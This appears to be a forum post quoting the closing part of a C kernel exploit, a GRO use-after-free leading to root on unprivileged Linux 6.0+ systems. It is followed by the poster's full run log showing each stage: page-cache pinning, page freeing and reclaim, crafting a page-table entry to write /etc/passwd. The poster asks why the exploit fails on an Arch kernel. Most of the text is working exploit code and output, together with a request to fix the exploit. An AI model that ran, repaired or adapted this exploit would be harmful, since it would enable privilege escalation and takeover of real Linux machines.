GRO managed-frag UAF → LPE ===\n" ; | | | fprintf stderr, "kernels 6.0+ | unprivileged | no BPF\n\n" ; | | | fprintf stderr, " backing up /etc/passwd...\n" ; | | | if do backup < 0 { | | | fprintf stderr, " - backup failed\n" ; | | | return 1; | | | } | | | fprintf stderr, " + backup at %s\n", BACKUP PATH ; | | | / Signaling pipes: child tells parent success/fail, parent tells child to exit / | | | int done pipe 2 , wait pipe 2 ; | | | if pipe done pipe < 0 || pipe wait pipe < 0 { | | | perror "signal pipes" ; | | | return 1; | | | } | | | pid t exploit pid = fork ; | | | if exploit pid < 0 { perror "fork" ; return 1; } | | | if exploit pid == 0 { | | | close done pipe 0 ; | | | close wait pipe 1 ; | | | exit do corrupt done pipe 1 , wait pipe 0 == 0 ? 0 : 1 ; | | | } | | | close done pipe 1 ; | | | close wait pipe 0 ; | | | / Wait for child to signal corruption result / | | | char result 4 = {0}; | | | ssize t rn = read done pipe 0 , result, sizeof result ; | | | close done pipe 0 ; | | | if rn < 2 || result 0 = 'O' { | | | fprintf stderr, " - exploit failed, restoring...\n" ; | | | void write wait pipe 1 , "X", 1 ; | | | close wait pipe 1 ; | | | waitpid exploit pid, NULL, 0 ; | | | do restore ; | | | return 1; | | | } | | | / Child holds pipe B open — escalate while page cache page is pinned / | | | do escalate ; | | | / Tell child it can exit now closes pipe B / | | | void write wait pipe 1 , "X", 1 ; | | | close wait pipe 1 ; | | | waitpid exploit pid, NULL, 0 ; | | | do restore ; | | | return 0; | | | } | Arch Linux fails. Kernel 6.18.32-1-lts doesn't contain 4db79a322db8 "net: gro: don't merge zcopy skbs" patch. === GRO managed-frag UAF → LPE === kernels 6.0+ | unprivileged | no BPF backing up /etc/passwd... + backup at /tmp/.gro passwd bak + veth pair ready MTU 4148, netem 50ms, GRO on receiver + TCP connection established + AF PACKET TX ring at 0x7e3038bc7000 1 UNMOVABLE pages + vmsplice'd 4096 bytes into pipe stale ref + registered 1-page buffer pinned, +1024 refcount each submitting seed + 1 SEND ZC... + submitted 2 SQEs 1 seed + 1 ZC + RST sent SO LINGER 0 , originals freed + CQEs: 2 sends, 1 notifs munmap AF PACKET ring remove PTE refs ... waiting for RCU grace period... draining UNMOVABLE PCP via pipe allocations... + drained 256 UNMOVABLE pages from PCP unregistering buffer unpin ... closing AF PACKET socket last ref dropped → pages freed ... + 1 pages freed to UNMOVABLE PCP pipe A has stale refs + pipe B: wrote 8-byte filler CAN MERGE, snatched UNMOVABLE page reading pipe A stale refs → frees pipe B's page... + drained 4096 bytes from pipe A + /etc/passwd mapped at 0x7e3038200000 2MB-aligned slot 0 + slot 0 touched — PTE page allocated from UNMOVABLE PCP + PTE 0 = 0xdeadbeefdeadbeef + /etc/passwd PFN = 0xdbeefdeadb phys 0xdbeefdeadb000 + crafted PTE 1 = 0x000dbeefdeadb067 + PTE 1 written via CAN MERGE — dirty pagetable armed writing payload through crafted PTE at 0x7e3038201000... - exploit failed, restoring... I've tried running it over 20 times. Perhaps it's failing because of the default memory allocation being zeroed out? bash $ zcat /proc/config.gz | grep INIT ON ALLOC CONFIG INIT ON ALLOC DEFAULT ON=y